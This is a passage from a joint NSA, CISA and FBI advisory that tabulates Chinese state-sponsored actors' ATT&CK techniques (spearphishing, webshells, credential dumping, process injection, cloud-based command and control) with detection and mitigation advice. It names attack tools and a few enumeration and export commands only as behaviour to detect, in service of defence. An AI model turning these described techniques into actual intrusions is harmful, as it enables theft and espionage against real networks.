actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. Chinese state-sponsored cyber actors have also been observed: Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA®) and plant webshells. Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources. Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability. Review previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources. Additional mitigations include: Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application. Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ). Use multi-factor authentication (MFA) with strong factors and require regular re-authentication. Disable protocols using weak authentication. Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [Embracing a Zero Trust Security Model]. When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines). Use automated tools to audit access logs for security concerns. Where possible, enforce MFA for password resets. Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked. Harden: Application Hardening [D3-AH] Platform Hardening Software Update [D3-SU] Detect: File Analysis [D3-FA]  Network Traffic Analysis Client-server Payload Profiling [D3-CSPP] Process Analysis  Process Spawn Analysis Process Lineage Analysis [D3-PLA] Isolate:  Network Isolation Inbound Traffic Filtering [D3-ITF] Phishing [T1566]:  Spearphishing Attachment [T1566.001]  Spearphishing Link [T1566.002] Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures.  These compromise attempts use the cyber actors’ dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.  Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions. Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments. Block uncommon file types in emails that are not needed by general users (.exe, .jar,.vbs) Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation. Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk. Prevent users from clicking on malicious links by stripping hyperlinks or implementing "URL defanging" at the Email Security Gateway or other email security tools. Add external sender banners to emails to alert users that the email came from an external sender. Harden:  Message Hardening Message Authentication [D3-MAN] Transfer Agent Authentication [D3-TAAN] Detect:  File Analysis Dynamic Analysis [D3-DA] Identifier Analysis Homoglyph Detection [D3-HD] URL Analysis [D3-UA] Message Analysis Sender MTA Reputation Analysis [D3-SMRA] Sender Reputation Analysis [D3-SRA]   External Remote Services [T1133] Chinese state-sponsored cyber actors have been observed: Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems. Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs). Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including net, asp, apsx, php, japx, and cfm.  Note: refer to the references listed above in Exploit Public-Facing Application [T1190] for information on CVEs known to be exploited by malicious Chinese cyber actors. Note: this technique also applies to Persistence [TA0003]. Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services. Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network. Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users). Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions. Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection. Review and verify all connections between customer systems, service provider systems, and other client enclaves. Harden: Software Update [D3-SU] Detect: Network Traffic Analysis Connection Attempt Analysis [D3-CAA] Platform Monitoring [D3-PM] Process Analysis Process Spawn Analysis [D3-SPA]  Process Lineage Analysis [D3-PLA] Valid Accounts [T1078]: Default Accounts [T1078.001] Domain Accounts [T1078.002] Chinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks. Note: this technique also applies to Persistence [TA0003], Privilege Escalation [TA0004], and Defense Evasion [TA0005]. Adhere to best practices for password and permission management. Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage  Do not store credentials or sensitive data in plaintext. Change all default usernames and passwords. Routinely update and secure applications using Secure Shell (SSH).  Update SSH keys regularly and keep private keys secure. Routinely audit privileged accounts to identify malicious use. Harden:  Credential Hardening Multi-factor Authentication [D3-MFA] Detect: User Behavior Analysis [D3-UBA] Authentication Event Thresholding [D3-ANET]  Job Function Access Pattern Analysis [D3-JFAPA] Tactics: Execution [TA0002] Table IV: Chinese state-sponsored cyber actors’ Execution TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Command and Scripting Interpreter [T1059]:  PowerShell® [T1059.001] Windows® Command Shell [T1059.003] Unix® Shell [T1059.004] Python [T1059.006] JavaScript [T1059.007] Network Device CLI [T1059.008] Chinese state-sponsored cyber actors have been observed: Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI). Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network.  Employing Python scripts to exploit vulnerable servers. Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network. PowerShell Turn on PowerShell logging. (Note: this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.) Push Powershell logs into a security information and event management (SIEM) tool. Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists. Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell. Remove PowerShell if it is not necessary for operations.  Restrict which commands can be used. Windows Command Shell Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts.  Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled.  Monitor for and investigate other unusual or suspicious scripting behavior.  Unix Use application controls to prevent execution. Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious.  If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious.  Python Audit inventory systems for unauthorized Python installations. Blocklist Python where not required. Prevent users from installing Python where not required. JavaScript Turn off or restrict access to unneeded scripting components. Blocklist scripting where appropriate. For malicious code served up through ads, adblockers can help prevent that code from executing. Network Device Command Line Interface (CLI) Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization. Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse. Ensure least privilege principles are applied to user accounts and groups. Harden:  Platform Hardening [D3-PH] Detect:  Process Analysis Script Execution Analysis [D3-SEA] Isolate: Execution Isolation Executable Allowlisting [D3-EAL] Scheduled Task/Job [T1053] Cron [T1053.003] Scheduled Task [T1053.005] Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtask or crontab to create and schedule tasks that enumerate victim devices and networks. Note: this technique also applies to Persistence [TA0003] and Privilege Escalation [TA0004]. •    Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity. •    Configure event logging for scheduled task creation and monitor process execution from svchost.exe (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in %systemroot%\System32\Tasks that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities—such as PowerShell or Windows Management Instrumentation (WMI)—that do not conform to typical administrator or user actions.  Detect:  Platform Monitoring Operating System Monitoring [D3-OSM] Scheduled Job Analysis [D3-SJA] System Daemon Monitoring [D3-SDM] System File Analysis [D3-SFA] Isolate:  Execution Isolation Executable Allowlisting [D3-EAL] User Execution [T1204] Malicious Link [T1204.001] Malicious File [T1204.002] Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment. Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute. Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications. Use a domain reputation service to detect and block suspicious or malicious domains. Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk. Ensure all browsers and plugins are kept up to date. Use modern browsers with security features turned on. Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation. Detect:  File Analysis Dynamic Analysis [D3-DA] File Content Rules [D3-FCR] Identifier Analysis Homoglyph Detection [D3-HD] URL Analysis [D3-UA] Network Traffic Analysis DNS Traffic Analysis [D3-DNSTA] Isolate:  Execution Isolation Hardware-based Process Isolation [D3-HBPI] Executable Allowlisting [D3-EAL] Network Isolation DNS Denylisting [D3-DNSDL] Outbound Traffic Filtering [D3-OTF] Tactics: Persistence [TA0003] Table V: Chinese state-sponsored cyber actors’ Persistence TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Hijack Execution Flow [T1574]:  DLL Search Order Hijacking [T1574.001] Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process.  Note: this technique also applies to Privilege Escalation [TA0004] and Defense Evasion [TA0005]. Disallow loading of remote DLLs. Enable safe DLL search mode. Implement tools for detecting search order hijacking opportunities. Use application allowlisting to block unknown DLLs. Monitor the file system for created, moved, and renamed DLLs. Monitor for changes in system DLLs not associated with updates or patches. Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path). Detect:  Platform Monitoring Operating System Monitoring Service Binary Verification [D3-SBV] Process Analysis File Access Pattern Analysis [D3-FAPA] Isolate:  Execution Isolation Executable Allowlisting [D3-EAL] Modify Authentication Process [T1556] Domain Controller Authentication [T1556.001] Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. Note: this technique also applies to Defense Evasion [TA0005] and Credential Access [TA0006]. Monitor for policy changes to authentication mechanisms used by the domain controller.  Monitor for modifications to functions exported from authentication DLLs (such as cryptdll.dll and samsrv.dll). Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.  Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours).  Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries. Detect:  Process Analysis [D3-PA] User Behavior Analysis Authentication Event Thresholding [D3-ANET] User Geolocation Logon Pattern Analysis [D3-UGLPA]   Server Software Component [T1505]:  Web Shell [T1505.003] Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.  Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures. Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts. Perform integrity checks on critical servers to identify and investigate unexpected changes. Have application developers sign their code using digital signatures to verify their identity. Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems. Implement a least-privilege policy on web servers to reduce adversaries’ ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories. If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity. Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials. Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones. Establish, and backup offline, a “known good” version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system. Employ user input validation to restrict exploitation of vulnerabilities. Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern. Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis. Detect:  Network Traffic Analysis Client-server Payload Profiling [D3-CSPP] Per Host Download-Upload Ratio Analysis [D3-PHDURA] Process Analysis  Process Spawn Analysis Process Lineage Analysis [D3-PLA] Isolate: Network Isolation Inbound Traffic Filtering [D3-ITF] Create or Modify System Process [T1543]: Windows Service [T1543.003] Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence. Note: this technique also applies to Privilege Escalation [TA0004]. Only allow authorized administrators to make service changes and modify service configurations.  Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment. Monitor WMI and PowerShell for service modifications. Detect: Process Analysis  Process Spawn Analysis [D3-PSA] Tactics: Privilege Escalation [TA0004] Table VI: Chinese state-sponsored cyber actors’ Privilege Escalation TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Domain Policy Modification [T1484] Group Policy Modification [T1484.001] Chinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation. Note: this technique also applies to Defense Evasion [TA0005]. Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools. Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications. Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to. Detect: Network Traffic Analysis Administrative Network Activity Analysis [D3-ANAA] Platform Monitoring Operating System Monitoring System File Analysis [D3-SFA] Process Injection [T1055]:  Dynamic Link Library Injection [T1055.001] Portable Executable Injection [T1055.002] Chinese state-sponsored cyber actors have been observed: Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement. Using shellcode that injects implants into newly created instances of the Service Host process (svchost) Note: this technique also applies to Defense Evasion [TA0005].   Use endpoint protection software to block process injection based on behavior of the injection process. Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. Monitor for suspicious sequences of Windows API calls such as CreateRemoteThread, VirtualAllocEx, or WriteProcessMemory and analyze processes for unexpected or atypical behavior such as opening network connections or reading files. To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection. Execution Isolation Hardware-based Process Isolation [D3-HBPI] Mandatory Access Control [D3-MAC] Tactics: Defense Evasion [TA0005] Table VII: Chinese state-sponsored cyber actors’ Defensive Evasion TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Deobfuscate/Decode Files or Information [T1140] Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device. Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. Consider blocking, disabling, or monitoring use of 7-Zip. Detect:  Process Analysis  Process Spawn Analysis [D3-PSA] Isolate:  Execution Isolation Executable Denylisting [D3-EDL] Hide Artifacts [T1564] Chinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process. Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage. Detect:  Process Analysis File Access Pattern Analysis [D3-FAPA]  Isolate: Execution Isolation Executable Allowlisting [D3-EAL] Indicator Removal from Host [T1070] Chinese state-sponsored cyber actors have been observed deleting files using rm or del commands. Several files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used. Make the environment variables associated with command history read only to ensure that the history is preserved. Recognize timestomping by monitoring the contents of important directories and the attributes of the files.  Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their ~/.bash_history or ConsoleHost_history.txt files. Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule. Detect:  Platform Monitoring Operating System Monitoring System File Analysis [D3-SFA] Process Analysis File Access Pattern Analysis [D3-FAPA]  Isolate: Execution Isolation Executable Allowlisting [D3-EAL] Obfuscated Files or Information [T1027] Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures. Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted. Detect: Process Analysis File Access Pattern Analysis [D3-FAPA] Signed Binary Proxy Execution [T1218] Mshta [T1218.005] Rundll32 [T1218.011] Chinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as Rundll32, as a proxy to execute malicious payloads. Monitor processes for the execution of known proxy binaries (e.g., rundll32.exe) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary. Detect: Process Analysis File Access Pattern Analysis [D3-FAPA] Process Spawn Analysis [D3-PSA]  Tactics: Credential Access [TA0006] Table VIII: Chinese state-sponsored cyber actors’ Credential Access TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Exploitation for Credential Access [T1212] Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers. Update and patch software regularly. Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately. Harden:  Platform Hardening Software Update [D3-SU] Credential Hardening Multi-factor Authentication [D3-MFA] OS Credential Dumping [T1003] •    LSASS Memory [T1003.001] •    NTDS [T1003.003] Chinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (NDST.DIT) for credential dumping. Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NDST.DIT. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts. Consider disabling or restricting NTLM.  Consider disabling WDigest authentication.  Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups). Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements.  Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2. Harden: Credential Hardening [D3-CH] Detect:  Process Analysis File Access Pattern Analysis [D3-FAPA] System Call Analysis [D3-SCA] Isolate:  Execution Isolation Hardware-based Process Isolation [D3-HBPI] Mandatory Access Control [D3-MAC] Tactics: Discovery [TA0007] Table IX: Chinese state-sponsored cyber actors’ Discovery TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques File and Directory Discovery [T1083] Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored. Detect:  User Behavior Analysis Job Function Access Pattern Analysis [D3-JFAPA] Process Analysis  Database Query String Analysis [D3-DQSA] File Access Pattern Analysis [D3-FAPA] Process Spawn Analysis [D3-PSA] Permission Group Discovery [T1069] Chinese state-sponsored cyber actors have been observed using commands, including net group and net localgroup, to enumerate the different user groups on the target network.  Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. Detect:  Process Analysis  Process Spawn Analysis [D3-PSA] System Call Analysis [D3-SCA] User Behavior Analysis [D3-UBA]   Process Discovery [T1057] Chinese state-sponsored cyber actors have been observed using commands, including tasklist, jobs, ps, or taskmgr, to reveal the running processes on victim devices. Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.  Detect:  Process Analysis  Process Spawn Analysis [D3-PSA] System Call Analysis [D3-SCA] User Behavior Analysis [D3-UBA] Network Service Scanning [T1046] Chinese state-sponsored cyber actors have been observed using Nbtscan and nmap to scan and enumerate target network information. •    Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. •    Use network intrusion detection and prevention systems to detect and prevent remote service scans such as Nbtscan or nmap. •    Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation. Detect:  Network Traffic Analysis Connection Attempt Analysis [D3-CAA] Isolate: Network Isolation Inbound Traffic Filtering [D3-ITF] Remote System Discovery [T1018] Chinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including ping, net group, and net user to enumerate target network information. Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession. Detect:  Process Analysis  Process Spawn Analysis [D3-PSA] User Behavior Analysis Job Function Access Pattern Analysis [D3-JFAPA] Tactics: Lateral Movement [TA0008] Table X: Chinese state-sponsored cyber actors’ Lateral Movement TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Exploitation of Remote Services [T1210] Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user. Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources. Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user. Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources. Disable or remove unnecessary services. Minimize permissions and access for service accounts. Perform vulnerability scanning and update software regularly. Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation. Detect:  Network Traffic Analysis Remote Terminal Session Detection [D3-RTSD]  User Behavior Analysis [D3-UBA] Isolate: Execution Isolation Mandatory Access Control [D3-MAC] Tactics: Collection [TA0009] Table XI: Chinese state-sponsored cyber actors’ Collection TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Archive Collected Data [T1560] Chinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage. Scan systems to identify unauthorized archival utilities or methods unusual for the environment. Monitor command-line arguments for known archival utilities that are not common in the organization's environment. Detect:  Process Analysis  File Access Pattern Analysis [D3-FAPA] Process Spawn Analysis [D3-PSA] Isolate: Execution Isolation Executable Denylisting [D3-EDL] Clipboard Data [T1115] Chinese state-sponsored cyber actors used RDP and execute rdpclip.exe to exfiltrate information from the clipboard. Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of pbcopy/pbpaste (Linux) or clip.exe (Windows) run by general users through command line). If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data. Detect: Network Traffic Analysis Remote Terminal Session Detection  [D3-RTSD] Isolate: Network Isolation Inbound Traffic Filtering [D3-ITF] Outbound Traffic Filtering [D3-OTF]  Data Staged [T1074] Chinese state-sponsored cyber actors have been observed using the mv command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network. Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Detect:  Process Analysis File Access Pattern Analysis [D3-FAPA] Email Collection [T1114] Chinese state-sponsored cyber actors have been observed using the New-MailboxExportRequest PowerShell cmdlet to export target email boxes. Audit email auto-forwarding rules for suspicious or unrecognized rulesets. Encrypt email using public key cryptography, where feasible. Use MFA on public-facing mail servers. Harden: Credential Hardening Multi-factor Authentication [D3-MFA] Message Hardening Message Encryption [D3-MENCR] Detect:  Process Analysis [D3-PA] Tactics: Command and Control [TA0011] Table XII: Chinese state-sponsored cyber actors’ Command and Control TTPs with detection and mitigation recommendations Threat Actor Technique / Sub-Techniques   Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques Application Layer Protocol [T1071] Chinese state-sponsored cyber actors have been observed: Using commercial cloud storage services for command and control. Using malware implants that use the Dropbox® API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive® API. Use network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware. Detect:  Network Traffic Analysis Client-server Payload Profiling [D3-CSPP] File Carving [D3-FC] Isolate:  Network Isolation DNS Denylisting [D3-DNSDL] Ingress Tool Transfer [T1105] Chinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks. Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior.  Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification. Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network. Isolate: Network Isolation Inbound Traffic Filtering [D3-ITF] Non-Standard Port [T1571] Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure.  Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2. Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port. Detect:   Network Traffic Analysis Client-server Payload Profiling [D3-CSPP] Protocol Metadata Anomaly Detection [D3-PMAD] Isolate: Network Isolation Inbound Traffic Filtering [D3-ITF] Outbound Traffic Filtering [D3-OTF] Protocol Tunneling [T1572] Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and dns2tcp.exe to conceal C2 traffic with existing network activity.  Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server)  Detect:  Network Traffic Analysis Protocol Metadata Anomaly Detection [D3-PMAD] Proxy [T1090]:  Multi-Hop Proxy [T1090.003] Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs. Monitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication. Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique. Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure. Detect:  Network Traffic Analysis Protocol Metadata Anomaly Detection [D3-PMAD] Relay Pattern Analysis [D3-RPA] Isolate:  Network Isolation Outbound Traffic Filtering [D3-OTF] Appendix B: MITRE ATT&CK Framework  Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors (Click here for the downloadable JSON file.)  Contact InformationTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov. For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or Cybersecurity_Requests@nsa.gov. Media Inquiries / Press Desk: •    NSA Media Relations, 443-634-0721, MediaRelations@nsa.gov •    CISA Media Relations, 703-235-2010, CISAMedia@cisa.dhs.gov •    FBI National Press Office, 202-324-3691, npo@fbi.gov References [1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits Revisions July 19, 2021: Initial Version This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-200A: Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department
    by CISA on 19 Luglio 2021 at 11:00 am

